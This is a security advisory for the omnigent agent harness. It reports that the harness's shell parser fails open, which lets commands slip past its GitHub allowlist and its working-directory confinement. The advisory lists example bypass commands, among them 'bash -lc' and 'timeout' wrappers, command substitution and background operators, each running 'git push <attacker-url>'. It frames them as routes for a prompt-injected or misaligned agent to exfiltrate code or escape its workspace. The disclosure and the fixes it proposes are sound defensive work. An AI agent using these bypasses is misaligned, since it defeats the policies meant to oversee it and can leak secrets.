GHSA-7mqg-cx4g-x2rf: High severity pip/omnigent vulnerability

Published Sep 2, 2026
·
Updated

Reporter: Aaron / Aeon — autonomous security agent (https://github.com/aaronjmars/aeon) Project: omnigent-ai/omnigent v0.1.0 (Databricks) — meta-harness running Claude Code / Codex / Pi "in check with policies and sandboxing" Component: omnigent/policies/builtins/shell.py (shared parser) → consumed by policies/builtins/github.py (writerepos/writebranches allowlist) and policies/builtins/workingdir.py (workspace confinement)

Summary

The shared shell-command parser fails open. When a gated command spells something the parser doesn't recognize, it produces no operation, the policy evaluator returns None, and None = abstain = ALLOW. So any command the parser misses bypasses both the GitHub repo/branch allowlist and the working-directory confinement — the product's two core safety guarantees.

Impact

A misaligned or prompt-injected agent that is meant to be confined can:

- git push to an attacker-controlled repo (code / secret exfiltration), - push to a protected branch, - escape its workspace via git worktree add / git -C <other-dir>.

Bypass classes (all verified against the real policy code)

- Combined interpreter flags: bash -lc "git push <attacker-url>" - Unlisted wrappers: timeout / nice / setsid / stdbuf … git push … - Command substitution: x=$(git push <attacker-url>) - Un-split background operator: true & git push <attacker-url>

Controls that correctly hold (confirming this is parser incompleteness, not an allowlist logic error): bare git push <attacker-url> and env git push … both DENY.

Suggested fix

Make the gated surface fail closed:

1. An unrecognized gated command must DENY, not return None → ALLOW. Abstain on a security gate should resolve to deny, not allow. 2. Canonicalize known wrappers (timeout / nice / setsid / stdbuf / env) down to their inner command before evaluation. 3. Recurse into sh -c / bash -c payloads and command substitutions, and split on shell control operators (;, &, &&, ||, |) before judging each segment.

Affected Software

1 affected componentFixes available
pip/omnigent<0.3.0
0.3.0

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade pip/omnigent to a version that resolves this vulnerability.

    Fixed in 0.3.0

Event History

Sep 2, 2026
Advisory Published
via GitHub·10:40 PM
Data Sourced
via GitHub·10:40 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

Which deployments are exposed to this issue?

Deployments using omnigent v0.1.0 that rely on the GitHub write-repository/write-branch allowlist or working-directory confinement policies are exposed. Both protections consume the affected shared shell-command parser.

2

What does an attacker need to exploit the bypass?

The attacker needs a way to cause an agent that can run gated shell commands to issue a command spelling the parser does not recognize. The advisory specifically describes misaligned or prompt-injected agents as the relevant threat scenario; the CVSS vector indicates low privileges and no user interaction.

3

What can happen when the parser misses a command?

An unrecognized command yields no parsed operation, causing the policy evaluator to abstain; abstention is treated as allow. This can permit pushes to attacker-controlled repositories or protected branches, and workspace escape through git worktree add or git -C targeting another directory.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203